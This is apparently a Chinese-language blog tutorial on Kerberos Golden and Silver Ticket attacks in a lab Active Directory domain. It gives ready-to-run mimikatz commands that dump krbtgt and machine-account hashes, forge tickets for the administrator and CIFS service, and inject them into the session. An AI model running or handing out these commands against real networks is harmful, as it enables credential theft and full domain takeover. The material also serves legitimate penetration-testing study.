票据传递攻击

前言

  前面写过哈希传递攻击,这次写的票据传递攻击是跟域渗透有关的。也终于学到了黄金票据与白银票据,由于之前没学kerberos,所以耽误了非常久。

黄金票据

  Golden Ticket(下面称为金票)是通过伪造的TGT(TicketGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。
  每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
  对于攻击者来说,实际上只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
  
  上面的内容,转载于文末,师傅总结的非常到位,我就直接复制粘贴过来了。

获取krbtgt的Hash

mimikatz.exe "lsadump::dcsync /domain:god.org /user:krbtgt" "exit"

  
  获取到Hash NTLM为58e91a5ac358d86513ab224312314061

生成黄金票据

  whoami /user获取sid
  
  这里我们不要最后一个-后面的所有内容,所以获取到的sid是S-1-5-21-2952760202-1353902439-2381784089

/admin:伪造的用户名
/domain:域名称
/sid:SID值,注意是去掉最后一个-后面的值
/krbtgt:krbtgt的HASH值
/ticket:生成的票据名称

  伪造administrator用户,并在当前目录下会生成golden.kiribi文件

mimikatz.exe "kerberos::golden /admin:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:golden.kiribi" "exit"

  

导入伪造的黄金票据

  为了能顺利导入伪造的黄金,使用klist查看Kerberos 票证缓存
  
  可看到有很多缓存票据,使用kerberos::purge,清空缓存票据
  
  现在无法访问域控中的文件
  
  使用kerberos::ptt golden.kiribi导入伪造的黄金票据
  
  现在可成功访问域控文件
  
  上面的命令整理成一句话就是

mimikatz.exe "kerberos::purge" "kerberos::ptt golden.kiribi" "kerberos::list" "exit"

白银票据

  Silver Tickets(下面称银票)就是伪造的ST(Service Ticket),因为在TGT已经在PAC里限定了给Client授权的服务(通过SID的值),所以银票只能访问指定服务。
  白银票据认证流程
  
  白银票据的服务列表

服务名称                    同时需要的服务
WMI                        HOST、RPCSS
PowerShell Remoting        HOST、HTTP
WinRM                      HOST、HTTP
Scheduled Tasks            HOST
Windows File Share         CIFS
LDAP                       LDAP
Windows Remote Server      RPCSS、LDAP、CIFS

  先到域控导出ntlm hash,找到域控的主机名+$,我这里的域控主机名是OWA,所以应该找到OWA$

privilege::debug
sekurlsa::logonpasswords

  
  获取到NTLM为2312094791e73c34a26e4525823556f3
  切换到普通用户,获取到SID,一样不要-最后的部分
  
  SID为S-1-5-21-2952760202-1353902439-2381784089

/domain:  当前域名称
/sid: 	  获取到的sid值
/target:  域控主机名全称
/service:目标服务器上面的kerberos服务,此处为cifs
/rc4:    域控账户的NTLM hash
/user:   要伪造的用户名,此处可用silver测试
mimikatz.exe "kerberos::purge" "kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /target:owa.god.org /service:cifs /rc4:2312094791e73c34a26e4525823556f3 /user:silver /ptt" "exit"

  

区别

访问权限不同

黄金票据:伪造TGT,可以获取任何Kerberos服务权限
白银票据:伪造TGS,只能访问指定的服务

加密方式不同

黄金票据由krbtgt hash加密
白银票据由server hash加密

认证流程不同

黄金票据的利用过程需要访问KDC
白银票据跳过KDC直接访问对应的服务器

参考文章

浅析黄金票据与白银票据
内网渗透测试:Kerberos 协议相关安全问题分析与利用

查看评论 -
评论